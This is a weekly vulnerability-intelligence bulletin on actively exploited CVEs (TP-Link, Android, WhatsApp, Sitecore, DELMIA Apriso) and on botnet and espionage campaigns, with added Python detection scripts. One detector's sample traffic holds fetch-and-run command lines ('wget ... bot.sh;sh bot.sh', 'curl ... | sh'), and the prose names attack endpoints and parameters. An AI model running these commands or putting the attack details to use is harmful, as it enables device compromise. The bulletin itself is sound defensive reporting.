Active KEV Additions and Espionage Operations Define the Week

September 5, 2025
Executive Summary
Trending / Critical Vulnerabilities
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Vulnerabilities abused by Botnet
Vulnerabilities Abused by Malware
PRE-NVD observed for this week
External References

Executive Summary

A dynamic mix of vulnerabilities shaped this week’s cyber landscape as flaws in networking gear, messaging platforms, Android devices, and enterprise software came under active exploitation. CISA expanded its KEV catalog with seven high-risk entries, including three tied to TP-Link devices, two Android zero-days under limited, targeted exploitation patched by Google, one affecting Meta-owned WhatsApp, and one impacting Sitecore Experience Manager (XM) and Experience Platform (XP). Industrial software was also in focus, with confirmed exploit attempts against DELMIA Apriso, underscoring how attackers continue to probe both consumer and enterprise ecosystems.

Botnet activity is on the rise, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications. At the same time, IoT-focused botnets like Mirai, Bashlite, Tsunami, and BrickerBot have intensified attacks on EirD1000 routers, aiming to establish persistence and enable lateral movement.  

Recent threat research has uncovered sophisticated exploitation campaigns showcasing the evolving tactics of advanced threat actors. Sekoia reported that TP-Link vulnerabilities were exploited through a chained attack by the Quad 7 botnet (CovertNetwork-1658), linked to Storm-0940. Separately, Mandiant uncovered a ViewState deserialization attack on Sitecore instances using exposed machine keys, leading to remote code execution. The intrusion revealed WEEPSTEEL malware for reconnaissance and the use of tools like EARTHWORM, DWAgent, and SharpHound to enable persistence, tunneling, and Active Directory mapping.

Together, these developments highlight how attackers continue to exploit weaknesses across networking hardware, mobile ecosystems, and critical business applications.

Trending / Critical Vulnerabilities

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-5086
A Deserialization of Untrusted Data Vulnerability has been identified in the DELMIA Apriso, affecting releases from 2020 through 2025 and carrying a critical CVSS score of 9.0. Dassault Systèmes issued an advisory in June 2025, warning that the flaw could enable remote code execution in Apriso’s Manufacturing Operation Management (MOM) and Manufacturing Execution System (MES) platforms, which form the backbone of many industrial environments. Recently, researchers at SANS.edu have observed active exploitation attempts traced to IP 156.244.33(.)162. The attacks use SOAP POST requests targeting /apriso/WebServices/FlexNetOperationsService.svc/Invoke, embedding malicious objects in XML that decode into Windows executables. Organizations are urged to apply patches immediately, monitor for suspicious SOAP traffic and Base64 payloads, and restrict internet exposure of MOM/MES systems to mitigate ongoing exploitation.  
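The advisory above recommends monitoring for suspicious SOAP traffic and Base64 payloads aimed at the Apriso Invoke endpoint. The following detection logic is an added example, not code from the original report or from Dassault Systèmes: it classifies HTTP request records by checking POSTs to the named endpoint for Base64 runs that decode to a Windows executable (the "MZ" header), or that are simply large opaque blobs. The endpoint path comes from the report; the 256-character "large blob" threshold and the sample request records are assumptions constructed for the demo.

```python
"""Added example, not code from the original report or from Dassault Systèmes:
flag SOAP POSTs to the DELMIA Apriso FlexNetOperationsService endpoint whose
XML body embeds a Base64 blob that decodes to a Windows executable (the 'MZ'
header). The request records at the bottom are constructed for the demo."""
import base64
import binascii
import re

# Endpoint named in the report as the target of the observed exploit attempts.
APRISO_INVOKE_PATH = "/apriso/WebServices/FlexNetOperationsService.svc/Invoke"
# Runs of Base64 alphabet long enough to carry a serialized object or binary.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Assumed threshold: legitimate Invoke calls rarely ship large opaque blobs.
LARGE_BLOB_CHARS = 256


def looks_like_pe(blob: bytes) -> bool:
    """Windows PE files start with the DOS stub magic 'MZ'."""
    return blob[:2] == b"MZ"


def decoded_b64_runs(body: str):
    """Yield the decoded bytes of every valid Base64 run found in the body."""
    for match in B64_RUN.finditer(body):
        try:
            yield base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not real Base64 (bad length or padding): skip it


def classify_request(method: str, path: str, body: str) -> str:
    """Return a verdict for one HTTP request: ignore / ok / suspicious / alert."""
    if method.upper() != "POST" or path.lower() != APRISO_INVOKE_PATH.lower():
        return "ignore"
    if any(looks_like_pe(blob) for blob in decoded_b64_runs(body)):
        return "alert: Base64 payload decodes to a Windows executable"
    if any(len(m.group(0)) >= LARGE_BLOB_CHARS for m in B64_RUN.finditer(body)):
        return "suspicious: large opaque Base64 payload in SOAP body"
    return "ok"


def scan_requests(records):
    """records: iterable of (id, method, path, body); returns [(id, verdict)]."""
    return [(rid, classify_request(m, p, b)) for rid, m, p, b in records]


# Constructed sample traffic (not captured data).
SOAP_TEMPLATE = (
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    "<s:Body><Invoke><payload>{}</payload></Invoke></s:Body></s:Envelope>"
)
FAKE_PE = b"MZ" + b"\x90" * 100  # stand-in for a dropped executable, not real code
SAMPLE_RECORDS = [
    ("r1", "POST", APRISO_INVOKE_PATH, SOAP_TEMPLATE.format("<item>OrderStatus</item>")),
    ("r2", "POST", APRISO_INVOKE_PATH, SOAP_TEMPLATE.format(base64.b64encode(FAKE_PE).decode())),
    ("r3", "POST", APRISO_INVOKE_PATH, SOAP_TEMPLATE.format(base64.b64encode(b"A" * 300).decode())),
    ("r4", "GET", "/apriso/login", ""),
]

if __name__ == "__main__":
    for rid, verdict in scan_requests(SAMPLE_RECORDS):
        print(rid, verdict)
```

The "MZ" check catches the specific behaviour the report describes (XML-embedded objects decoding to Windows executables); the size heuristic is a weaker signal meant for triage rather than blocking, since some legitimate Invoke calls may carry encoded attachments.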

CVE-2025-9377
An OS Command Injection vulnerability has been identified in the TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 routers, specifically within the Parental Control page. The flaw affects firmware versions released before 241108, allowing attackers to potentially inject and execute malicious commands. While TP-Link issued patched firmware for these models, both devices have since reached end-of-life (EoL), meaning they will no longer receive long-term support or security updates beyond the available fix. Users are therefore strongly encouraged to migrate to newer hardware that ensures ongoing protection and performance. For those unable to upgrade immediately, TP-Link recommends applying the patched firmware, restoring the router, and disabling remote management in favor of the official Tether app. The flaw has also been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation risk.

CVE-2025-38352
A TOCTOU (Time-of-Check Time-of-Use) Race Condition vulnerability has been discovered in the Linux kernel's POSIX CPU timers subsystem. This issue occurs when a non-autoreaping task, during its exit process, triggers a race between handle_posix_cpu_timers() and posix_cpu_timer_del(), potentially leading to missed timer detections, unstable task cleanup, and overall system instability. Google addressed the issue in its Android security updates by introducing exit_state validation to mitigate the flaw. Actively exploited as a zero-day in limited, targeted attacks, this kernel-level vulnerability has also been added to the CISA KEV catalog, underscoring its severity and ongoing risk.

CVE-2025-48543
A Privilege Escalation vulnerability affecting the Android Runtime (ART) has been acknowledged by Google as a zero-day flaw under limited, targeted exploitation. The bug allows local privilege escalation without requiring any user interaction, making it a serious concern for Android users. While technical specifics remain undisclosed, Google has released a patch in its September 2025 Android Security Bulletin. The vulnerability has also been added to the CISA KEV catalog, emphasizing the urgency for users to apply the patch promptly to mitigate active threats.

CVE-2025-53690
A Deserialization of Untrusted Data vulnerability has been discovered in Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud, with a critical CVSS score of 9.0, allowing attackers to potentially execute remote code on affected systems. The issue traces back to older deployment guides that included publicly exposed ASP.NET machine keys, which attackers have exploited to launch ViewState deserialization attacks capable of injecting malicious code and gaining unauthorized access. A joint disclosure by Mandiant and Sitecore confirmed active exploitation of this issue, and it has since been added to the CISA KEV catalog. Sitecore has advised organizations to review their environments, secure exposed machine keys, and follow mitigation guidance from Microsoft Threat Intelligence, Mandiant, and Sitecore.

CVE-2025-55177
An Incorrect Authorization vulnerability in WhatsApp has been identified, allowing an unrelated user to force a target’s device into processing content from a malicious URL. The flaw impacted WhatsApp for iOS (prior to v2.25.21.73), WhatsApp Business for iOS (v2.25.21.78), and WhatsApp for Mac (v2.25.21.78) before being patched by the company, which has also begun issuing security notifications to individuals believed to have been targeted over the past three months. Although serious on its own, the risk was amplified when combined with Apple’s CVE-2025-43300, an out-of-bounds write vulnerability in the Image I/O framework affecting iOS, iPadOS, and macOS. This exploit chain enabled a sophisticated “zero-click” attack, requiring no user interaction, that has reportedly impacted both iPhone and Android users, including journalists and human rights defenders, highlighting the persistent risks posed by government spyware. The flaw has since been added to the CISA KEV catalog.

CVE-2023-50224
An Authentication Bypass by Spoofing Vulnerability has been identified in the TP-Link TL-WR841N router, specifically within the httpd service that listens on TCP port 80. The flaw enables network-adjacent attackers to access sensitive information, including stored credentials, without authentication. Once compromised, these credentials can provide attackers with a pathway to further infiltrate the device and connected systems. As the affected products have already reached end-of-life (EoL) and will not receive security updates, users are strongly advised to replace them with supported hardware. This vulnerability has also been added to the CISA KEV catalog recently, underscoring its exploitation risk.

CVE-2020-24363
A Missing Authentication for Critical Function Vulnerability has been disclosed in the TP-Link TL-WA855RE Wi-Fi Range Extender (V5 20200415-rel37464), carrying a CVSS score of 8.8 (High). The flaw allows attackers to bypass the standard login requirement of the web interface by exploiting exposed APIs, enabling them to set a new administrative password and gain full control of the device. While a patch was previously noted in 2021, TP-Link has since confirmed that the device has reached end-of-life (EoL), meaning no further updates or support will be provided. As a result, users are strongly urged to replace affected hardware with newer, supported models to mitigate the risk. Although over five years old, this vulnerability has only recently been added to the CISA KEV catalog, highlighting its continued exploitation risk.

Exploit Activity and Mass Scanning Observed on Cytellite Sensors

Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.

Vulnerability | Product | Severity | Title | Exploited in the wild | CISA KEV
CVE-2024-47176 | CUPS | Medium | Improper Input Validation Vulnerability in OpenPrinting CUPS cups-browsed through 2.0.1 leads to remote code execution | True | False
CVE-2024-4577 | PHP-CGI on Windows | High | Critical Argument Injection Vulnerability in PHP on Windows servers | True | True
CVE-2024-3721 | TBK DVR Devices | Medium | OS Command Injection Vulnerability in TBK DVR-4104 and DVR-4216 up to 20240412 | False | False
CVE-2024-1709 | ConnectWise ScreenConnect | Critical | Authentication Bypass Vulnerability in ConnectWise ScreenConnect through 23.9.7 leads to sensitive information disclosure | True | True
CVE-2023-38646 | Metabase open source and Enterprise | Critical | Remote Code Execution Vulnerability in Metabase open source and Metabase Enterprise | True | False
CVE-2023-26801 | LB-LINK | Critical | Command Injection Vulnerability in LB-LINK devices | True | False
CVE-2022-34045 | Wavlink devices | Critical | Hardcoded Encryption/Decryption Key Vulnerability in Wavlink WN530HG4 M30HG4.V5030.191116 | False | False
CVE-2022-30075 | TP-Link Router | High | Improper Validation Vulnerability in TP-Link Router leads to remote code execution | True | False
CVE-2022-41040 | Microsoft Exchange Server | High | Server-Side Request Forgery Vulnerability in Microsoft Exchange Server | True | True

Vulnerabilities abused by Botnet

Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented here are the top 5 CVEs with payloads suggestive of botnet activity, such as the use of wget with IP addresses.

Vulnerability | Product | Title | Exploit | Abused by Botnet
CVE-2022-22947 | Spring Cloud Gateway | Remote Code Execution Vulnerability in Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ | True | EnemyBot, Sysrv-K
CVE-2021-22205 | GitLab (ExifTool) | Remote Code Execution Vulnerability in GitLab (ExifTool) | True | Andoryu
CVE-2017-9841 | Util/PHP/eval-stdin.php in PHPUnit | Arbitrary PHP Code Execution Vulnerability in Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 | True | AndroxGh0st
CVE-2016-10372 | Eir D1000 modem | Improper Protocol Access Control Vulnerability in Eir D1000 modem | True | Bashlite, BrickerBot, Tsunami, Mirai
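The section above selects botnet-related CVEs by looking for payloads that use wget with raw IP addresses. The following heuristic is an added example, not code from the original report or from the Loginsoft platform: it URL-decodes each request line, finds a download utility (wget, curl, tftp, ftpget) and reports any bare IPv4 address inside that command segment as an IoC. The utility list and the sample request lines (using RFC 5737 documentation addresses) are constructed assumptions.

```python
"""Added example, not code from the original report: flag request payloads in
which a download utility fetches from a bare IPv4 address, the pattern the
report associates with botnet activity. Sample lines are constructed and use
RFC 5737 test addresses."""
import re
import urllib.parse

# Download utility followed by the rest of its shell command segment
# (stops at ; & | or newline, so only that one command is inspected).
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b([^;&|\n]*)", re.IGNORECASE)
# Dotted-quad IPv4 with each octet in 0-255.
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)


def fetch_iocs(payload: str):
    """Return [(utility, ipv4)] for every fetch-from-IP found in one payload."""
    text = urllib.parse.unquote_plus(payload)  # undo %XX and '+' URL encoding
    hits = []
    for m in FETCH_RE.finditer(text):
        for ip in IPV4_RE.findall(m.group(2)):
            hits.append((m.group(1).lower(), ip))
    return hits


def scan_log(lines):
    """Map each flagged request line to its IoCs; quiet lines are omitted."""
    flagged = {}
    for line in lines:
        hits = fetch_iocs(line)
        if hits:
            flagged[line] = hits
    return flagged


# Constructed sample request lines (not sensor data).
SAMPLE_LINES = [
    "GET /cgi-bin/status?cmd=cd%20/tmp;wget%20http://203.0.113.5/bot.sh;sh%20bot.sh HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",
    'POST /api/run {"c":"curl -s http://198.51.100.7:8080/u.sh | sh"}',
    "GET /update?src=wget+https://example.com/firmware.bin HTTP/1.1",
]

if __name__ == "__main__":
    for line, iocs in scan_log(SAMPLE_LINES).items():
        print(iocs, "<-", line)
```

A fetch from a hostname (the last sample line) is deliberately not flagged: the report's signal is the raw IP, which is typical of throwaway staging servers, whereas legitimate firmware and package updates normally use DNS names. Extracted IPs can be fed to a blocklist or correlated with the sensor telemetry in the previous section.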

Vulnerabilities Abused by Malware

We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.

CVE-2025-53690
Mandiant Threat Defense discovered an active ViewState deserialization attack targeting Sitecore deployments that relied on sample machine keys exposed in legacy Sitecore deployment guides from 2017 and earlier. The vulnerability, tracked as CVE-2025-53690, was exploited on an internet-facing Sitecore instance, allowing remote code execution. A decrypted payload revealed WEEPSTEEL, a custom malware used for internal reconnaissance, followed by the attacker archiving sensitive files such as web.config and conducting host and network mapping. Tooling was staged in a public directory, including EARTHWORM, an open-source tunneling utility to maintain covert communication, DWAgent, an open-source remote access tool enabling persistent control and Active Directory reconnaissance, and SharpHound, an open-source framework for mapping Active Directory relationships to support privilege escalation.  

The attacker also created local administrator accounts and attempted to dump SAM/SYSTEM hives to obtain cached credentials, ultimately using them for lateral movement over RDP. Although Mandiant disrupted the operation before its full lifecycle could be observed, the adversary’s deep understanding of Sitecore and the exploited vulnerability was evident throughout their progression from initial compromise to privilege escalation.
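Both the CVE-2025-53690 entry earlier in this report and the Mandiant write-up above come down to one configuration fact: a static ASP.NET machineKey copied from a published sample lets anyone forge ViewState. The audit below is an added example, not code from Sitecore, Mandiant or the original report. It parses a web.config, reports whether a static machineKey is configured, and compares the key fingerprints against an inventory of keys known to be public. The sample configs and the single "published" fingerprint are constructed placeholders; no real Sitecore sample key appears here.

```python
"""Added example, not code from Sitecore, Mandiant or the original report:
audit an ASP.NET web.config for a static <machineKey> and check it against a
list of key fingerprints known to have been published (for example copied
from sample deployment guides). The configs and the 'published' fingerprint
below are constructed placeholders, not real Sitecore keys."""
import hashlib
import xml.etree.ElementTree as ET


def fingerprint(key_hex: str) -> str:
    """SHA-256 over the normalised hex key, so the inventory never stores keys in clear."""
    return hashlib.sha256(key_hex.strip().upper().encode()).hexdigest()


# Placeholder inventory of known-public keys (constructed; replace with your own).
SAMPLE_PUBLISHED_KEY = "0123456789ABCDEF" * 8  # 128 hex chars, like a real validationKey
PUBLISHED_KEY_FINGERPRINTS = {fingerprint(SAMPLE_PUBLISHED_KEY)}


def audit_machine_key(web_config_xml: str) -> list:
    """Return a list of findings for one web.config (empty when nothing needs attention)."""
    root = ET.fromstring(web_config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is None:
        return []  # ASP.NET default: keys auto-generated per machine, nothing static to leak
    vk = mk.get("validationKey", "AutoGenerate")
    dk = mk.get("decryptionKey", "AutoGenerate")
    if vk.startswith("AutoGenerate") and dk.startswith("AutoGenerate"):
        return []
    # A static key is legitimate in a web farm, but it must be privately generated.
    findings = ["static machineKey configured: confirm it was generated privately "
                "and has never appeared in documentation, tickets or source control"]
    for name, value in (("validationKey", vk), ("decryptionKey", dk)):
        if fingerprint(value) in PUBLISHED_KEY_FINGERPRINTS:
            findings.append(f"{name} matches a known-published key: "
                            "ViewState forgery possible, rotate immediately")
    return findings


# Constructed sample configs (not taken from any product documentation).
AUTO_CONFIG = (
    '<configuration><system.web><machineKey validationKey="AutoGenerate,IsolateApps" '
    'decryptionKey="AutoGenerate,IsolateApps"/></system.web></configuration>'
)
PRIVATE_CONFIG = (
    '<configuration><system.web><machineKey validationKey="' + "FEDCBA9876543210" * 8 +
    '" decryptionKey="' + "89ABCDEF01234567" * 4 + '" validation="HMACSHA256" '
    'decryption="AES"/></system.web></configuration>'
)
PUBLISHED_CONFIG = (
    '<configuration><system.web><machineKey validationKey="' + SAMPLE_PUBLISHED_KEY +
    '" decryptionKey="' + "FEDCBA9876543210" * 4 + '"/></system.web></configuration>'
)

if __name__ == "__main__":
    for label, cfg in (("auto", AUTO_CONFIG), ("private", PRIVATE_CONFIG), ("published", PUBLISHED_CONFIG)):
        print(label, audit_machine_key(cfg) or ["no findings"])
```

Run this across every web.config in the farm and the load balancer's shared configuration; a match against the published inventory is the condition Mandiant describes, and the fix is key rotation on all nodes at once, since a rotated key on one node invalidates ViewState issued by the others.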

Quad 7 Botnet Targets TP-Link Routers
According to Sekoia.io, a TP-Link WR841N router (firmware 3.16.9 Build 150320 Rel.57500n) was observed being exploited through a chained attack attributed to the Quad 7 botnet (aka CovertNetwork-1658), operated by the China-linked threat actor Storm-0940. The attackers first leveraged an unauthenticated file disclosure vulnerability, CVE-2023-50224, tracked internally by TP-Link as TPVD 202321023 TL-WR841N, to extract credentials stored in /tmp/dropbear/dropbearpwd and replay them in HTTP Basic authentication. Once authenticated, they proceeded to exploit a command injection flaw in the Parental Control page, CVE-2025-9377, by tampering with the url_0 parameter, ultimately achieving remote code execution. This chained exploitation highlights how threat actors combine multiple flaws to bypass security layers and conduct stealthy, high-impact attacks.

CVE | Severity | Title | Patch | Targeted By Malware | OSS
CVE-2025-9377 | High | OS Command Injection Vulnerability in the TP-Link Archer C7(EU) and TL-WR841N/ND(MS) | No | Quad7 (aka CovertNetwork-1658), Storm-0940 | False
CVE-2025-53690 | Critical | Deserialization of Untrusted Data Vulnerability in Sitecore Experience Manager (XM), Sitecore Experience Platform (XP) | Yes | WEEPSTEEL, EARTHWORM, DWAgent, SharpHound | False
CVE-2023-50224 | Medium | Authentication Bypass by Spoofing Vulnerability in the TP-Link TL-WR841N | No | Quad7 (aka CovertNetwork-1658), Storm-0940 | False

PRE-NVD observed for this week

PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

CVE-ID | Type of Vulnerability | Product | Reference
CVE-2025-9518 | Arbitrary File Deletion | atec Debug plugin | Resource
CVE-2025-9714 | Buffer Overflow | libxslt/libxml2 | Resource
CVE-2025-9865 | UI Spoofing | Google Chrome | Resource
CVE-2025-26454 | Privilege Escalation | Google Android | Resource

External References

  1. https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog
  2. https://www.cisa.gov/news-events/alerts/2025/09/02/cisa-adds-two-known-exploited-vulnerabilities-catalog
  3. https://www.cisa.gov/news-events/alerts/2025/09/04/cisa-adds-three-known-exploited-vulnerabilities-catalog
  4. https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserialization-zero-day-vulnerability
  5. https://isc.sans.edu/diary/32256
  6. https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003865
  7. https://source.android.com/docs/security/bulletin/2025-09-01
  8. https://www.whatsapp.com/security/advisories/2025?
  9. https://blog.sekoia.io/solving-the-7777-botnet-enigma-a-cybersecurity-quest/#h-are-all-of-these-compromised-tp-links
  10. https://securityonline.info/cve-2025-5086-cvss-9-0-a-critical-rce-in-delmia-apriso-with-exploit-attempts-seen-in-the-wild/
